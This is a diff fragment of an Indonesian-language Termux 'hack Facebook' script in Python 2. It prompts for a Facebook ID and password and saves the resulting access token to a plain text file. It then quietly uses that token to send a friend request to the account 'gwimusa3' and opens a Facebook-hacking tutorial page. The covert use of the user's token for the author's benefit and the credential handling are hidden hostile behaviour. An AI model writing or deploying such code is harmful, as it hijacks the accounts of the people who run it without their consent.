@@ -94,7 +94,8 @@ def login():
         os.system('clear')
         print logo
         print 1 * '\x1b[1;91m\xc2\xab\x1b[1;93m-------------------------\x1b[1;97m\xe2\x9c\xa7\x1b[1;93m------------------------\x1b[1;91m\xc2\xbb'
         print '\x1b[1;97m[\x1b[1;92m*\x1b[1;97m] \x1b[1;96mLOGIN AKUN FACEBOOK DULU \x1b[1;97m[\x1b[1;92m*\x1b[1;97m]'
         print '\x1b[1;97m[\x1b[1;92m*\x1b[1;97m] \x1b[1;96mcubit layar agar tampilan logo terlihat semua :) \x1b[1;97m[\x1b[1;92m*\x1b[1;97m]'
         print '\x1b[1;97m[\x1b[1;92m*\x1b[1;97m] \x1b[1;96mLalu login ke akun facebook. Silahkan isi  \x1b[1;97m[\x1b[1;92m*\x1b[1;97m]'
         id = raw_input('\x1b[1;97m[\x1b[1;92m+\x1b[1;97m] \x1b[1;92mID/Email \x1b[1;91m: \x1b[1;92m')
         pwd = raw_input('\x1b[1;97m[\x1b[1;92m+\x1b[1;97m] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;92m')
         tik()
 @@ -124,7 +125,7 @@ def login():
                 unikers = open('login.txt', 'w')
                 unikers.write(z['access_token'])
                 unikers.close()
                 print '\n\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mLogin Berhasil. Untuk panduan baca di web berikut!'
                 print '\n\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mLogin Berhasil. Untuk panduan cara menggunakan script ini baca di web berikut!'
                 requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
                 time.sleep(3)
                 os.system('xdg-open https://storiku.xyz/cara-hack-facebook-menggunakan-termux-untuk-pemula')
